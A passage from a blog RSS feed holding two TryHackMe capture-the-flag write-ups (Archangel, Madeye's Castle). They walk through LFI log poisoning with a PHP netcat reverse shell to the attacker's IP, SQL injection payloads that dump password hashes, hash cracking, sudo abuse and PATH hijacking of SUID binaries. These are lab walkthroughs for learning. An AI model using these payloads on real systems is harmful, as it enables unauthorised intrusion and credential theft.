The thing is that Linux treats “//” as “/”, so that means, even if “../..” is blocked, we can easily bypass it using “..//..”.</p><p>Bypassing the path traversal protection and reading the access.log file, I saw that the User-Agent was being logged. Doing a simple Google search showed me that indeed, this can be converted to RCE (Remote Code Execution) using a simple technique.<br>First, make a simple request to the domain, replacing the normal User-Agent with:</p><pre>&lt;?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc *Your machine IP* 4444 &gt;/tmp/f') ?&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-QV55lGPg3odnADf7SuRmw.jpeg" /></figure><p>Then, open a netcat listener in your terminal</p><pre>nc -lvnp 4444 </pre><blockquote>Here -l: to listen for an incoming connection, -n: to stop netcat from performing domain name resolution, -v: for verbose, and -p: to specify which port to listen on.</blockquote><p>Then make another request to the website, this time by using the LFI and calling access.log, which would now have logged the malicious code we passed as the User-Agent, and will execute it.</p><pre>http://mafialive/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zykt4e0Jl0D9Yr9GY8Z3sw.jpeg" /></figure><p>And we get a shell back. Awesome, isn’t it?</p><p>Now this is a very basic shell, with no <strong>tab-auto completion</strong> or <strong>Ctrl-c</strong> to stop the current process. <strong>Ctrl-c</strong> on this shell and it will kill the connection; it has happened to me, and man, was getting the connection back a <em>bitch</em>. 
ANYWAY, let’s upgrade the shell before proceeding.</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'</pre><p>This will give you a slightly better shell, but without those magical features. To get a fully functioning TTY shell, press Ctrl-z to background the current shell, then on your terminal type:</p><pre>stty raw -echo; fg</pre><p>and press Enter twice. Then on your shell:</p><pre>stty rows 16 columns 136<br>export TERM=xterm-256color<br>reset</pre><p><strong>If you skip the export TERM step, you won’t be able to open the text editor.</strong></p><p>And you’ll feel right at home…. or maybe not.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BV-yVsgfl49aRd_afAPRFQ.jpeg" /></figure><p>Getting the user flag was easy: just go to the archangel directory and cat the user.txt file.<br>Now, on to escalating our privileges. There was a folder named myfiles, in which there was a file called password backup; when I printed the file, it had a link to a YouTube video. If you have done any amount of CTFs, you very well know where this is leading up to. A “Rick Astley — Never Gonna Give You Up” video. I swear to god, if I see this video one more time. See man, no offense, but this meme has been going on for too long, and at this point it is just painful to watch. Moving on. There was another folder by the name secret, but I didn’t have the permission to open it.</p><p>I tried running sudo -l, but since I didn’t know the password for www-data, this wasn’t an option. Next, I tried to find a binary with the SUID bit set, but no luck there either. Next, I looked for some cronjobs that might be running, but found nothing.<br>After exhausting all my options, I tried looking for any interesting files user archangel may own.
Using the find command:</p><pre>find / -user archangel -type f 2&gt;/dev/null | grep -v /proc</pre><blockquote>Here, /: specifies the directory from where to begin searching (root in this case), -user: only show files owned by a particular user, -type: specify what to find (f for regular files), 2&gt;/dev/null: redirects standard error to /dev/null, so it hides any error (such as “Permission denied”) during the execution of this command. |: pipes the output of the left command as input to the right command. grep: to grab a particular pattern from a given input, -v: to hide lines matching the specified pattern.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uGkfW2Tsllxdis9TLFSJRw.jpeg" /></figure><p>And we finally find something interesting! A bash script owned by the user. If we can modify the file, we can maybe see what’s inside the secret folder. We did have permission to write to the script, but when I tried cd’ing into the secret directory, permission was denied, and no matter what I did, I couldn’t see the contents of the folder. So, I tried getting a reverse shell on my machine, changing the file to a Python executable and using the reverse shell from <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"><strong><em>swisskyrepo</em></strong></a>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ItQwKOrDP-_r5bsWZMrh-A.jpeg" /></figure><p>I executed the file and got a reverse shell as…. www-data. That’s a lot of work just to fail, isn’t it? Just for the sake of it, I tried running it as the user archangel (sudo -u archangel ./helloworld), because there wasn’t anything else to do really. First it asked for www-data’s credentials; thinking it was the wrong way to go about it, I pressed Ctrl-c to exit, and I got a reverse shell back….
as archangel?</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/887/1*I4vnAB8Q9Rb9U91_MNIleA.jpeg" /></figure><p>I was surprised, to say the least. I don’t think this was the intended route; I’ll update the article when I get to know about it. Until then, let’s move on.</p><p><strong>Update</strong>: Okay, it looks like I just ignored the crontab output; apparently there was a cronjob running every minute, executing helloworld.sh as the user archangel. That was the reason why I got the reverse shell back. If you’re wondering what a cronjob is, let me explain in brief. Basically, Cron is a time-based job scheduler which is preinstalled in every Unix-based distribution. Using Cron, you can schedule menial tasks which you would like to be executed at a certain interval, and you can also specify which user the said job will run as, archangel in the case above. These repeating tasks that Cron performs are called cronjobs, and can be viewed in the file /etc/crontab.</p><p>After getting the privilege escalation, I cd’ed into the secret directory and got the second flag. Also, I understood the real way to do it, as it was very clearly mentioned in the flag. Eh, what’s done is done, <em>amirite</em>. No, no, worry not, I’ll update the article when I do it the right way.</p><p>In the secret folder, apart from the flag, there was also a binary executable with the SUID bit set. I exported the file to my computer for further inspection.<br>Opening the file using Ghidra and decompiling the main function, the binary was calling cp through system(), and since the binary runs as root, this would mean that if I can somehow make it run my own cp instead of the system one, I can get root access.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*A961BzdHAGD1RL29l4xkCQ.jpeg" /></figure><p>To do that, first create a file called cp in the secret folder (or any folder, just remember to set the PATH variable correctly).
Inside the cp file, set the payload to:</p><pre>#!/bin/bash<br>bash -p</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1008/1*xEjJUp4O9tahP29nLsR8_Q.jpeg" /></figure><p>And give it executable permission (chmod +x cp, just in case you were wondering). This will give you root access when executed. Next, set the PATH variable using:</p><pre>export PATH=$PWD:$PATH</pre><p>I did this so that the system will first check for the cp file in this directory, instead of going to the system-defined cp binary.<br>I executed the binary, got <strong>root</strong> access and solved the box.</p><p>If you have any suggestions, do let me know in the comments.<br>Have a nice day.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | Madeye’s Castle Writeup]]></title>
            <link>https://anubhavuniyal.medium.com/tryhackme-madeyes-castle-writeup-e637db17da31?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/e637db17da31</guid>
            <category><![CDATA[tryhackme-writeup]]></category>
            <category><![CDATA[tryhackme-walkthrough]]></category>
            <category><![CDATA[writeup]]></category>
            <category><![CDATA[tryhackme]]></category>
            <category><![CDATA[capture-the-flag]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Tue, 02 Feb 2021 11:34:21 GMT</pubDate>
            <atom:updated>2021-02-03T18:07:09.765Z</atom:updated>
<content:encoded><![CDATA[<p>This is my first write-up, so excuse me for any mistakes.</p><p>You can find this room here: <a href="https://tryhackme.com/room/madeyescastle">https://tryhackme.com/room/madeyescastle</a></p><h3>Overview</h3><p>This is a medium-rated boot2root box, made by TryHackMe user <a href="https://tryhackme.com/p/madeye"><em>madeye</em></a>. This is a very interesting box with some new concepts. Firstly, this box uses a method called Virtual Domain Name Hosting (which I go over briefly in the associated section). Secondly, mutating a word-list using different rules and getting the password. Thirdly, exploiting a binary through GTFOBins to escalate privileges. And finally, getting the root flag by exploiting a system call of a SUID binary. Also, the SQLi can’t be done using an automated tool, so you’ll have some trouble if you’re not used to manual injection. All in all, an awesome box which I had fun rooting. Without any further ado, let’s get into it.</p><h3>Let’s Break In!</h3><p>First things first, always start with an Nmap scan:</p><pre>sudo nmap -sS -sV -sC -oA nmap/castle 10.10.137.43 -vv</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/945/1*KZlRY9hQMLc6bfDmNWYMcg.jpeg" /></figure><blockquote>Here -sS: SYN scan, -sC: for “safe” scripts, or default scripts, -sV: for version enumeration, -oA: output in all formats (grepable, XML and default Nmap output), -vv: for verbose output.</blockquote><p>We see that 4 ports are open on this box. While the Nmap scan is running, let’s visit the service on port 80, which is the reserved port for HTTP. On opening the website, we are greeted with an Apache default page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lpMpXyWkoMhMZh0tk4FOEQ.jpeg" /></figure><p>Nothing interesting here, so let’s run a directory brute force.
Any brute-forcing tool will work; I prefer to use Gobuster.</p><pre>gobuster dir -u <a href="http://10.10.137.43">http://10.10.137.43</a> -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -x php --threads 50 -o gobuster.out</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bxX3CSEs8Nd934Wb9UTeYA.jpeg" /></figure><blockquote>Here, dir: to specify directory brute-forcing, -u: to specify the target URL, -w: to specify the word list; I use raft-small-directories.txt. It is included in SecLists over at GitHub, which you can clone into your own distro, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word list from <a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-directories.txt"><strong>here</strong></a>. -x: to specify the extension. This switch will append .php to every word to check if a file with that name also exists. You can specify multiple file types, separated by a comma. --threads: to specify the number of concurrent requests. Use this switch very cautiously, as in the real world a huge number of requests to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. -o: to specify the output file.</blockquote><p>Gobuster got a hit on a directory with the name backup. Let’s check it out.</p><p>On visiting the directory we see that we are not authorized to view its root. So, let’s just brute force this URI to see if we are able to find something interesting here.</p><pre>gobuster dir -u <a href="http://10.10.137.43">http://10.10.137.43</a>/backup -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -x php --threads 50 -o gobuster.out</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qDYxih2jcsPGAyA83t0Btw.jpeg" /></figure><p>We see that we got a hit inside the backup directory: a directory called email.
On visiting it, we see it’s a text file with some interesting information in it. It’s a conversation between two people, talking about virtual hosting. There is also a link provided at the bottom of the document if you want to know what virtual hosting is, or more specifically what virtual domain name hosting (which is used in this box) is, and how it is used. But, in simple terms, virtual domain name hosting is a method for hosting multiple domain names on a single server. Why is this used? Because you can host two (or more) different websites using the same IP address, saving the cost of having to buy multiple IP addresses.<br>So, we know that this particular box is using virtual domain name hosting and that the name of the other domain is hogwarts-castle.thm.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QzIJz5tjjB5sNW4dZ4cKUw.jpeg" /></figure><p>Now, to visit this particular website, we have two options (that I know of):<br> 1. You can proxy your traffic through Burp, or any other proxy of your choice, make a request to <strong><em>*THM Box IP*</em></strong> (10.10.137.43 in my case), intercept the traffic, and change the Host header from <strong><em>*THM Box IP*</em></strong> to hogwarts-castle.thm. The drawback with this method is that every time you want to make a new request you have to change the Host header to the domain name, or else your browser will throw an error as it won’t find the host.<br> 2. The second, and easier, method is to edit your hosts file. If you are using a Linux-based distro, your hosts file will be located in the /etc directory. Open your /etc/hosts file in a text editor and in the IPv4 section add the <strong><em>*THM Box IP*</em></strong> and the domain name, separated by a space.
Now, whenever you enter the domain name, your browser will automatically route you to the desired location.<br>Let’s go to hogwarts-castle.thm.<br>When we go to the website, we are yet again greeted by the same default webpage. It seems we made a mistake somewhere. On reading the email again, we see that the actual domain name granted was <strong><em>hogwartz-castle.thm</em></strong> instead. Making the required changes in our hosts file, and visiting the domain again, we are greeted with a login page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*grpzc_eS4NCIrUG3_LUJ6g.jpeg" /></figure><p>Doing a simple SQLi check on the webpage using SQLMap shows that the page might be vulnerable to SQLi, but there was no success. So, I decided to try some simple payloads on my own. Using the payload</p><pre>user=admin' or 1=1 --&amp;password=admin</pre><p>we get a response back saying that the password for “<strong>Lucas Washington is incorrect”</strong>. The username was leaked. This means we are on the right track. Wonder why SQLMap didn’t work. I decided to give SQLMap another try. Still no luck; it would appear that the queries sent by SQLMap ̶a̶r̶e̶ ̶b̶e̶i̶n̶g̶ ̶b̶l̶o̶c̶k̶e̶d̶ ̶b̶y̶ ̶a̶ ̶W̶A̶F̶ (Web-Application Firewall) (<strong><em>They weren’t actually</em></strong>). SQLMap provides us with an option to get around this by adding --tamper=space2comment to our SQLMap request.<br>After bashing my head against the wall with SQLMap, I understood that this technique won’t work. So, I decided to take a different route.</p><p>Let’s take a step back and see what else we found using Nmap. We can see that port 445 is listening, which is the default SMB port, used by Samba shares. I connected to this port using smbclient, using anonymous login. But it failed, so I used Nmap scripts to enumerate this port further. Using Nmap we found that the shared folder was named samba share, and not anonymous.
Logging in through smbclient, we see that two documents are shared, “.<em>names.txt</em>” and “<em>spellnames.txt</em>”; we get both of those documents for further inspection.</p><p>One document contains “spell names” as the name suggests, possibly passwords for SSH, and the other document contains two names, Hagrid and Hermonine. This I thought was a typo; correcting the spelling and trying to brute-force SSH through the password list using Hydra was…. unsuccessful. Trying the other 2 usernames, nothing happened. At this point the only feasible option we have left is somehow exploiting the SQLi, since SQLMap failed to do that for us. I decided to go the manual route. SQLMap already provided us with a payload, so I decided to try it using Burp Repeater. Using the payload, we see that payload values are reflected in the output. It is clear that we can control the output, which means we can pass functions to it and get data back.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YrPr39AmwnpesS6Tohxq-w.jpeg" /></figure><p>Now this part took me a loooooot of time, not that this was insanely hard, but just because I am not very good at SQLi’s. Currently. <br>Anyhow, after some hours of researching I finally constructed a payload</p><pre>' union select group_concat(password),2,3,4 FROM users-- -</pre><p>This payload reflected the password hashes of different users in the database. <strong>Finally</strong>. Running one of the hashes through Haiti, we get to know that these are SHA-512. Trying to crack the hashes through john using the rockyou word-list, we find no passwords. Looks like we missed something. So I ran my SQLi payload through Burp Intruder, replacing “password” with some common server-side column names, using the default Burp wordlist, and sure enough we got some more information: user names, and notes. On further inspection of the notes, one thing stands out.
The second user has a hint to his password.</p><pre>My password used best64</pre><p>Huh, the name of this user was “Harry Turner”. Inputting this name in the user field of the login form displays the same message, which would mean that the second hash of the password list is this user’s password. best64 sounded a lot like base64, so I converted each line from “spellnames.txt” to its base64 counterpart and used this list to crack the hashes, but that was <em>Plain</em>-wrong (sorry for the awful pun). After some Google-fu, it was clear that best64 is a mutation rule, and that hashcat already ships with it. Using the pre-built best64 rule in hashcat on the password hash, we crack it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*o8sJNKK_4OJ_OQH7smi7Gg.jpeg" /><figcaption>The password has been redacted.</figcaption></figure><p>Finally logging into the website, we found that Harry is reusing his passwords, thanks to the very conveniently placed message. This means we got access to the machine. Upon SSHing into the machine we are greeted by a message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*FzDobRXf3fj88P25hA8glA.jpeg" /></figure><p>Also, we got our first flag.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/800/1*o_eKKYLeQRKxS4uGrfaXxg.jpeg" /></figure><p>Next, escalating privileges. Running sudo -l we see that user hermonine can run pico with escalated privileges. To <a href="https://gtfobins.github.io/">GTFOBins</a> we go. Following the instructions there, we are now user hermonine. And, we got the second flag. That was easy.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/577/1*oQnXYAahx8kamK-IcdqINw.jpeg" /></figure><p>And if you are wondering why your shell and my shell look so different, I just upgraded this shell using</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'</pre><p>And you’ll be back on track.
If it still feels weird, do this:</p><pre>stty rows 13 columns 136<br>reset</pre><p>Now, for the root flag. Since we don’t know the password for user hermonine, sudo is out of the question. The next logical step will be to find a file with the SUID bit set.</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><blockquote>Here, /: specifies the directory from where to begin searching (root in this case), -perm: only show files with a particular permission (-u=s matches files whose setuid bit is set), -type: specify what to find (f for regular files), 2&gt;/dev/null: redirects standard error to /dev/null, so it hides any error (such as “Permission denied”) during the execution of this command.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B7dJiroyQP5OHkT9G5tmYQ.jpeg" /></figure><p>Everything else is just routine, except a file named swagger. Executing this, it asks us to guess a number, and then outputs a random number if we are wrong. I saw this and immediately my mind went to a buffer-overflow exploit. But to confirm my thesis, I need to see the internals of this program. So I exported this file to my machine using netcat; I usually prefer Python, but it was not working correctly on this machine for some reason. <br>I opened the file using Ghidra. <br>It would appear that if we guess the number correctly the program makes a system call to <strong><em>*uname -p*</em></strong>. It appears that the binary can be exploited using spoofing techniques. But, that means no buffer-overflow. Aww, sad programmer noises.</p><p>The main issue in exploiting this binary lies with guessing the random number. After some researching, I found out that the function “rand()” used for random number generation was unsafe, as it displayed the same number if called in quick succession.
This was very easy to confirm using bash.</p><pre>for i in {1..5};do echo 1 | ./swagger ; done</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qwI8ocgE3M0KAdmJzvipRQ.jpeg" /></figure><p>With that out of the way, we can start fooling the system. First, we create a file called uname (because the program calls a system binary with the same name) in the same directory, with</p><pre>cat /root/root.txt</pre><p>as the payload. We give this file executable permission. This will output our flag. We add our pwd (present working directory) to the beginning of the PATH environment variable, so that the system will first check for the uname file in this directory, using</p><pre>export PATH=/srv/time-turner:$PATH</pre><p>Now, we will execute the program passing any number to it, grep the output number, and pass it back to the program, so that it successfully executes.</p><pre>echo 0 | ./swagger | awk '{print $5}' | tail -1 | ./swagger</pre><p>This command will help us achieve that. I can’t show you the output of this command as it contains the flag. But trust me, this works.</p><p>This was my first write-up, so I hope you enjoyed it. If you have any suggestions, do let me know in the comments.<br>Have a nice day.</p>]]></content:encoded>
        </item>
    </channel>
</rss>